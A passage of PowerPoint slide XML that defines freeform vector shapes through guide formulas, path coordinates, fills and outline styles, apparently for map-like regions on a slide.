                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 90"/>
                  <a:gd name="T1" fmla="*/ 22 h 42"/>
                  <a:gd name="T2" fmla="*/ 2 w 90"/>
                  <a:gd name="T3" fmla="*/ 20 h 42"/>
                  <a:gd name="T4" fmla="*/ 3 w 90"/>
                  <a:gd name="T5" fmla="*/ 18 h 42"/>
                  <a:gd name="T6" fmla="*/ 5 w 90"/>
                  <a:gd name="T7" fmla="*/ 17 h 42"/>
                  <a:gd name="T8" fmla="*/ 6 w 90"/>
                  <a:gd name="T9" fmla="*/ 17 h 42"/>
                  <a:gd name="T10" fmla="*/ 8 w 90"/>
                  <a:gd name="T11" fmla="*/ 18 h 42"/>
                  <a:gd name="T12" fmla="*/ 9 w 90"/>
                  <a:gd name="T13" fmla="*/ 18 h 42"/>
                  <a:gd name="T14" fmla="*/ 10 w 90"/>
                  <a:gd name="T15" fmla="*/ 18 h 42"/>
                  <a:gd name="T16" fmla="*/ 12 w 90"/>
                  <a:gd name="T17" fmla="*/ 17 h 42"/>
                  <a:gd name="T18" fmla="*/ 14 w 90"/>
                  <a:gd name="T19" fmla="*/ 17 h 42"/>
                  <a:gd name="T20" fmla="*/ 15 w 90"/>
                  <a:gd name="T21" fmla="*/ 16 h 42"/>
                  <a:gd name="T22" fmla="*/ 16 w 90"/>
                  <a:gd name="T23" fmla="*/ 16 h 42"/>
                  <a:gd name="T24" fmla="*/ 16 w 90"/>
                  <a:gd name="T25" fmla="*/ 14 h 42"/>
                  <a:gd name="T26" fmla="*/ 18 w 90"/>
                  <a:gd name="T27" fmla="*/ 13 h 42"/>
                  <a:gd name="T28" fmla="*/ 19 w 90"/>
                  <a:gd name="T29" fmla="*/ 12 h 42"/>
                  <a:gd name="T30" fmla="*/ 20 w 90"/>
                  <a:gd name="T31" fmla="*/ 10 h 42"/>
                  <a:gd name="T32" fmla="*/ 21 w 90"/>
                  <a:gd name="T33" fmla="*/ 8 h 42"/>
                  <a:gd name="T34" fmla="*/ 22 w 90"/>
                  <a:gd name="T35" fmla="*/ 6 h 42"/>
                  <a:gd name="T36" fmla="*/ 23 w 90"/>
                  <a:gd name="T37" fmla="*/ 5 h 42"/>
                  <a:gd name="T38" fmla="*/ 25 w 90"/>
                  <a:gd name="T39" fmla="*/ 4 h 42"/>
                  <a:gd name="T40" fmla="*/ 26 w 90"/>
                  <a:gd name="T41" fmla="*/ 2 h 42"/>
                  <a:gd name="T42" fmla="*/ 28 w 90"/>
                  <a:gd name="T43" fmla="*/ 2 h 42"/>
                  <a:gd name="T44" fmla="*/ 30 w 90"/>
                  <a:gd name="T45" fmla="*/ 2 h 42"/>
                  <a:gd name="T46" fmla="*/ 30 w 90"/>
                  <a:gd name="T47" fmla="*/ 1 h 42"/>
                  <a:gd name="T48" fmla="*/ 33 w 90"/>
                  <a:gd name="T49" fmla="*/ 2 h 42"/>
                  <a:gd name="T50" fmla="*/ 36 w 90"/>
                  <a:gd name="T51" fmla="*/ 4 h 42"/>
                  <a:gd name="T52" fmla="*/ 39 w 90"/>
                  <a:gd name="T53" fmla="*/ 1 h 42"/>
                  <a:gd name="T54" fmla="*/ 41 w 90"/>
                  <a:gd name="T55" fmla="*/ 0 h 42"/>
                  <a:gd name="T56" fmla="*/ 43 w 90"/>
                  <a:gd name="T57" fmla="*/ 4 h 42"/>
                  <a:gd name="T58" fmla="*/ 46 w 90"/>
                  <a:gd name="T59" fmla="*/ 6 h 42"/>
                  <a:gd name="T60" fmla="*/ 46 w 90"/>
                  <a:gd name="T61" fmla="*/ 9 h 42"/>
                  <a:gd name="T62" fmla="*/ 50 w 90"/>
                  <a:gd name="T63" fmla="*/ 9 h 42"/>
                  <a:gd name="T64" fmla="*/ 52 w 90"/>
                  <a:gd name="T65" fmla="*/ 6 h 42"/>
                  <a:gd name="T66" fmla="*/ 57 w 90"/>
                  <a:gd name="T67" fmla="*/ 4 h 42"/>
                  <a:gd name="T68" fmla="*/ 64 w 90"/>
                  <a:gd name="T69" fmla="*/ 7 h 42"/>
                  <a:gd name="T70" fmla="*/ 67 w 90"/>
                  <a:gd name="T71" fmla="*/ 3 h 42"/>
                  <a:gd name="T72" fmla="*/ 75 w 90"/>
                  <a:gd name="T73" fmla="*/ 3 h 42"/>
                  <a:gd name="T74" fmla="*/ 81 w 90"/>
                  <a:gd name="T75" fmla="*/ 6 h 42"/>
                  <a:gd name="T76" fmla="*/ 84 w 90"/>
                  <a:gd name="T77" fmla="*/ 10 h 42"/>
                  <a:gd name="T78" fmla="*/ 83 w 90"/>
                  <a:gd name="T79" fmla="*/ 29 h 42"/>
                  <a:gd name="T80" fmla="*/ 75 w 90"/>
                  <a:gd name="T81" fmla="*/ 28 h 42"/>
                  <a:gd name="T82" fmla="*/ 64 w 90"/>
                  <a:gd name="T83" fmla="*/ 25 h 42"/>
                  <a:gd name="T84" fmla="*/ 51 w 90"/>
                  <a:gd name="T85" fmla="*/ 34 h 42"/>
                  <a:gd name="T86" fmla="*/ 44 w 90"/>
                  <a:gd name="T87" fmla="*/ 33 h 42"/>
                  <a:gd name="T88" fmla="*/ 35 w 90"/>
                  <a:gd name="T89" fmla="*/ 36 h 42"/>
                  <a:gd name="T90" fmla="*/ 31 w 90"/>
                  <a:gd name="T91" fmla="*/ 42 h 42"/>
                  <a:gd name="T92" fmla="*/ 16 w 90"/>
                  <a:gd name="T93" fmla="*/ 41 h 42"/>
                  <a:gd name="T94" fmla="*/ 9 w 90"/>
                  <a:gd name="T95" fmla="*/ 37 h 42"/>
                  <a:gd name="T96" fmla="*/ 2 w 90"/>
                  <a:gd name="T97" fmla="*/ 33 h 42"/>
                  <a:gd name="T98" fmla="*/ 1 w 90"/>
                  <a:gd name="T99" fmla="*/ 24 h 42"/>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90"/>
                  <a:gd name="T151" fmla="*/ 0 h 42"/>
                  <a:gd name="T152" fmla="*/ 90 w 90"/>
                  <a:gd name="T153" fmla="*/ 42 h 42"/>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90" h="42">
                    <a:moveTo>
                      <a:pt x="1" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="23"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35890" name="Freeform 424"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3429" y="2224"/>
                <a:ext cx="51" cy="51"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 51"/>
                  <a:gd name="T1" fmla="*/ 51 h 51"/>
                  <a:gd name="T2" fmla="*/ 41 w 51"/>
                  <a:gd name="T3" fmla="*/ 44 h 51"/>
                  <a:gd name="T4" fmla="*/ 40 w 51"/>
                  <a:gd name="T5" fmla="*/ 41 h 51"/>
                  <a:gd name="T6" fmla="*/ 39 w 51"/>
                  <a:gd name="T7" fmla="*/ 38 h 51"/>
                  <a:gd name="T8" fmla="*/ 35 w 51"/>
                  <a:gd name="T9" fmla="*/ 36 h 51"/>
                  <a:gd name="T10" fmla="*/ 32 w 51"/>
                  <a:gd name="T11" fmla="*/ 37 h 51"/>
                  <a:gd name="T12" fmla="*/ 29 w 51"/>
                  <a:gd name="T13" fmla="*/ 34 h 51"/>
                  <a:gd name="T14" fmla="*/ 25 w 51"/>
                  <a:gd name="T15" fmla="*/ 32 h 51"/>
                  <a:gd name="T16" fmla="*/ 19 w 51"/>
                  <a:gd name="T17" fmla="*/ 32 h 51"/>
                  <a:gd name="T18" fmla="*/ 5 w 51"/>
                  <a:gd name="T19" fmla="*/ 27 h 51"/>
                  <a:gd name="T20" fmla="*/ 3 w 51"/>
                  <a:gd name="T21" fmla="*/ 21 h 51"/>
                  <a:gd name="T22" fmla="*/ 6 w 51"/>
                  <a:gd name="T23" fmla="*/ 12 h 51"/>
                  <a:gd name="T24" fmla="*/ 3 w 51"/>
                  <a:gd name="T25" fmla="*/ 4 h 51"/>
                  <a:gd name="T26" fmla="*/ 7 w 51"/>
                  <a:gd name="T27" fmla="*/ 3 h 51"/>
                  <a:gd name="T28" fmla="*/ 13 w 51"/>
                  <a:gd name="T29" fmla="*/ 2 h 51"/>
                  <a:gd name="T30" fmla="*/ 22 w 51"/>
                  <a:gd name="T31" fmla="*/ 1 h 51"/>
                  <a:gd name="T32" fmla="*/ 26 w 51"/>
                  <a:gd name="T33" fmla="*/ 0 h 51"/>
                  <a:gd name="T34" fmla="*/ 29 w 51"/>
                  <a:gd name="T35" fmla="*/ 3 h 51"/>
                  <a:gd name="T36" fmla="*/ 28 w 51"/>
                  <a:gd name="T37" fmla="*/ 5 h 51"/>
                  <a:gd name="T38" fmla="*/ 33 w 51"/>
                  <a:gd name="T39" fmla="*/ 7 h 51"/>
                  <a:gd name="T40" fmla="*/ 35 w 51"/>
                  <a:gd name="T41" fmla="*/ 10 h 51"/>
                  <a:gd name="T42" fmla="*/ 32 w 51"/>
                  <a:gd name="T43" fmla="*/ 14 h 51"/>
                  <a:gd name="T44" fmla="*/ 38 w 51"/>
                  <a:gd name="T45" fmla="*/ 21 h 51"/>
                  <a:gd name="T46" fmla="*/ 41 w 51"/>
                  <a:gd name="T47" fmla="*/ 22 h 51"/>
                  <a:gd name="T48" fmla="*/ 40 w 51"/>
                  <a:gd name="T49" fmla="*/ 27 h 51"/>
                  <a:gd name="T50" fmla="*/ 36 w 51"/>
                  <a:gd name="T51" fmla="*/ 27 h 51"/>
                  <a:gd name="T52" fmla="*/ 38 w 51"/>
                  <a:gd name="T53" fmla="*/ 29 h 51"/>
                  <a:gd name="T54" fmla="*/ 42 w 51"/>
                  <a:gd name="T55" fmla="*/ 32 h 51"/>
                  <a:gd name="T56" fmla="*/ 45 w 51"/>
                  <a:gd name="T57" fmla="*/ 35 h 51"/>
                  <a:gd name="T58" fmla="*/ 50 w 51"/>
                  <a:gd name="T59" fmla="*/ 36 h 51"/>
                  <a:gd name="T60" fmla="*/ 48 w 51"/>
                  <a:gd name="T61" fmla="*/ 39 h 51"/>
                  <a:gd name="T62" fmla="*/ 51 w 51"/>
                  <a:gd name="T63" fmla="*/ 43 h 51"/>
                  <a:gd name="T64" fmla="*/ 48 w 51"/>
                  <a:gd name="T65" fmla="*/ 44 h 51"/>
                  <a:gd name="T66" fmla="*/ 50 w 51"/>
                  <a:gd name="T67" fmla="*/ 47 h 51"/>
                  <a:gd name="T68" fmla="*/ 50 w 51"/>
                  <a:gd name="T69" fmla="*/ 48 h 51"/>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51"/>
                  <a:gd name="T106" fmla="*/ 0 h 51"/>
                  <a:gd name="T107" fmla="*/ 51 w 51"/>
                  <a:gd name="T108" fmla="*/ 51 h 51"/>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51" h="51">
                    <a:moveTo>
                      <a:pt x="50" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="48"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35891" name="Freeform 425"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3429" y="2224"/>
                <a:ext cx="51" cy="51"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 47 w 51"/>
                  <a:gd name="T1" fmla="*/ 51 h 51"/>
                  <a:gd name="T2" fmla="*/ 41 w 51"/>
                  <a:gd name="T3" fmla="*/ 44 h 51"/>
                  <a:gd name="T4" fmla="*/ 40 w 51"/>
                  <a:gd name="T5" fmla="*/ 41 h 51"/>
                  <a:gd name="T6" fmla="*/ 39 w 51"/>
                  <a:gd name="T7" fmla="*/ 38 h 51"/>
                  <a:gd name="T8" fmla="*/ 35 w 51"/>
                  <a:gd name="T9" fmla="*/ 36 h 51"/>
                  <a:gd name="T10" fmla="*/ 32 w 51"/>
                  <a:gd name="T11" fmla="*/ 37 h 51"/>
                  <a:gd name="T12" fmla="*/ 29 w 51"/>
                  <a:gd name="T13" fmla="*/ 34 h 51"/>
                  <a:gd name="T14" fmla="*/ 25 w 51"/>
                  <a:gd name="T15" fmla="*/ 32 h 51"/>
                  <a:gd name="T16" fmla="*/ 19 w 51"/>
                  <a:gd name="T17" fmla="*/ 32 h 51"/>
                  <a:gd name="T18" fmla="*/ 5 w 51"/>
                  <a:gd name="T19" fmla="*/ 27 h 51"/>
                  <a:gd name="T20" fmla="*/ 3 w 51"/>
                  <a:gd name="T21" fmla="*/ 21 h 51"/>
                  <a:gd name="T22" fmla="*/ 6 w 51"/>
                  <a:gd name="T23" fmla="*/ 12 h 51"/>
                  <a:gd name="T24" fmla="*/ 3 w 51"/>
                  <a:gd name="T25" fmla="*/ 4 h 51"/>
                  <a:gd name="T26" fmla="*/ 7 w 51"/>
                  <a:gd name="T27" fmla="*/ 3 h 51"/>
                  <a:gd name="T28" fmla="*/ 13 w 51"/>
                  <a:gd name="T29" fmla="*/ 2 h 51"/>
                  <a:gd name="T30" fmla="*/ 22 w 51"/>
                  <a:gd name="T31" fmla="*/ 1 h 51"/>
                  <a:gd name="T32" fmla="*/ 26 w 51"/>
                  <a:gd name="T33" fmla="*/ 0 h 51"/>
                  <a:gd name="T34" fmla="*/ 29 w 51"/>
                  <a:gd name="T35" fmla="*/ 3 h 51"/>
                  <a:gd name="T36" fmla="*/ 28 w 51"/>
                  <a:gd name="T37" fmla="*/ 5 h 51"/>
                  <a:gd name="T38" fmla="*/ 33 w 51"/>
                  <a:gd name="T39" fmla="*/ 7 h 51"/>
                  <a:gd name="T40" fmla="*/ 35 w 51"/>
                  <a:gd name="T41" fmla="*/ 10 h 51"/>
                  <a:gd name="T42" fmla="*/ 32 w 51"/>
                  <a:gd name="T43" fmla="*/ 14 h 51"/>
                  <a:gd name="T44" fmla="*/ 38 w 51"/>
                  <a:gd name="T45" fmla="*/ 21 h 51"/>
                  <a:gd name="T46" fmla="*/ 41 w 51"/>
                  <a:gd name="T47" fmla="*/ 22 h 51"/>
                  <a:gd name="T48" fmla="*/ 40 w 51"/>
                  <a:gd name="T49" fmla="*/ 27 h 51"/>
                  <a:gd name="T50" fmla="*/ 36 w 51"/>
                  <a:gd name="T51" fmla="*/ 27 h 51"/>
                  <a:gd name="T52" fmla="*/ 38 w 51"/>
                  <a:gd name="T53" fmla="*/ 29 h 51"/>
                  <a:gd name="T54" fmla="*/ 42 w 51"/>
                  <a:gd name="T55" fmla="*/ 32 h 51"/>
                  <a:gd name="T56" fmla="*/ 45 w 51"/>
                  <a:gd name="T57" fmla="*/ 35 h 51"/>
                  <a:gd name="T58" fmla="*/ 50 w 51"/>
                  <a:gd name="T59" fmla="*/ 36 h 51"/>
                  <a:gd name="T60" fmla="*/ 48 w 51"/>
                  <a:gd name="T61" fmla="*/ 39 h 51"/>
                  <a:gd name="T62" fmla="*/ 51 w 51"/>
                  <a:gd name="T63" fmla="*/ 43 h 51"/>
                  <a:gd name="T64" fmla="*/ 48 w 51"/>
                  <a:gd name="T65" fmla="*/ 44 h 51"/>
                  <a:gd name="T66" fmla="*/ 50 w 51"/>
                  <a:gd name="T67" fmla="*/ 47 h 51"/>
                  <a:gd name="T68" fmla="*/ 50 w 51"/>
                  <a:gd name="T69" fmla="*/ 48 h 51"/>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51"/>
                  <a:gd name="T106" fmla="*/ 0 h 51"/>
                  <a:gd name="T107" fmla="*/ 51 w 51"/>
                  <a:gd name="T108" fmla="*/ 51 h 51"/>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51" h="51">
                    <a:moveTo>
                      <a:pt x="50" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="41"/>
